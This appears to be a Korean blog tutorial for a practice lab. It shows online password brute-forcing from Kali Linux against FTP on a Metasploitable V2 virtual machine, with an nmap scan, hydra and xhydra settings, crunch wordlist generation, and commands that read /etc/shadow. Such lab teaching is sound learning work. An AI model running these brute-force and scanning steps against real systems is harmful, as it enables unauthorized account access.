본문 바로가기

Learning/└◆Network Hacking

online crack remote passwd attack (hydra & xhydra)

[실습] 칼리 리눅스 사용하기

 

사용시스템

- Metasploitable V2 Linux

- KaliLinux

 

온라인(Online) 패스워드 크랙(Crack)하기(Remote Password Attack)

(GUI) xhydra(hydra-gtk),

(CLI) hydra 툴을 사용해 보자.

 

프로그램 사용방법

Password Attacks > ONline Attacks > hydra-gtk (hydra)

or

# hydra

 

(작업 시나리오)

(KaliLinux(hydra)) --- password crack ---> (Metasploitable V2 Linux(ftpd))

 

(KaliLinux)

 

Meta 서버의 포트 스캔

# nmap -sV -O -F 192.168.10.134   Metasploitable V2 Linux IP : 192.168.10.134

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-22 17:25 KST

Nmap scan report for 192.168.10.134

Host is up (0.00053s latency).

Not shown: 82 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

23/tcp open telnet Linux telnetd

25/tcp open smtp Postfix smtpd

53/tcp open domain ISC BIND 9.4.2

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)

111/tcp open rpcbind 2 (RPC #100000)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

513/tcp open login?

514/tcp open tcpwrapped

2049/tcp open nfs 2-4 (RPC #100003)

2121/tcp open ftp ProFTPD 1.3.1

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

5900/tcp open vnc VNC (protocol 3.3)

6000/tcp open X11 (access denied)

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

MAC Address: 00:0C:29:FA:DD:2A (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

Network Distance: 1 hop

Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds

 

 

[참고] hydra

# hydra -l mfsadmin -P <암호 사전 파일> <타켓> <프로토콜>

or

# xhydra

 

 

 

xhydra

(GUI) xhydra

(TUI) hydra CMD

 

# xhydra &

-> 생성된 사전 파일을 가지고 작업한다.

-> 사전 파일을 생성하고 크랙하는 과정은 아래 [참고] 내용을 확인한다.

 

=======================================================================

Target

Target

single target : 192.168.10.134

port : 21

protocol : ftp

Output Options

[ v ] Show Attempts

Passwords

Username : user1

Password : [ v ] Password list : (사전 파일은 아래 [참고]에서 만들어진 파일 사용)

Start

왼쪽 하단 부분에 "Start"

=======================================================================

 

 

 

 

[참고] Kali Linux 서버에서 사전파일을 생성하고 FTP 통해 user1 사용자의 패스워드를 크랙한다.

 

(Metasploitable V2 Linux)

서버에서 아이디/패스가 쉬운 사용자(EX: user1)를 만든다.

 

$ sudo useradd -m -s /bin/bash user1 (/etc/sudoers)

$ sudo passwd user1

 

$ cat /etc/passwd

$ sudo cat /etc/shadow

 

$ ftp localhost 21

user1/user1

> quit

 

 

 

 

(KaliLinux)

# cd /root/bin

 

[참고] 출력 내용 확인

# crunch 1 3

-> 출력 내용을 확인한다.

# crunch 1 3 ' a1'

-> 출력 내용을 확인한다.

 

[참고] 사전 파일 만드는 방법

인터넷상에 받은 사전 파일 : a.txt

직접 만든 사전 파일 : b.txt

# cat a.txt b.txt | sort -u > c.txt

 

# crunch 1 5 user1 > user.list (# crunch 1 5 user1 | head -1000 > user.list)

# cat user.list

# grep --color user1 user.list

 

# xhydra

username : user1

passwd list : /root/bin/user.list

 

 

(Meta)

$ sudo cat /var/log/vsftpd.log ($ sudo tail -f /var/log/vsftpd.log)

$ sudo cat /var/log/auth.log ($ sudo tail -f /var/log/auth.log)

 

 

다음 사이트에서 brute force attack 통해 암호가 얼마의 시간안에 크랙이 되는지 계산해 보자.

http://lastbit.com/pswcalc.asp

'Learning > └◆Network Hacking' 카테고리의 다른 글

네트워크 해킹 - 01. MAC 주소 검색 & 이더넷 프레임 구조  (0) 2017.01.22
searchsploit (Exploit DB)  (0) 2017.01.09
John The Ripper  (0) 2017.01.09
패스워드 크랙  (0) 2017.01.09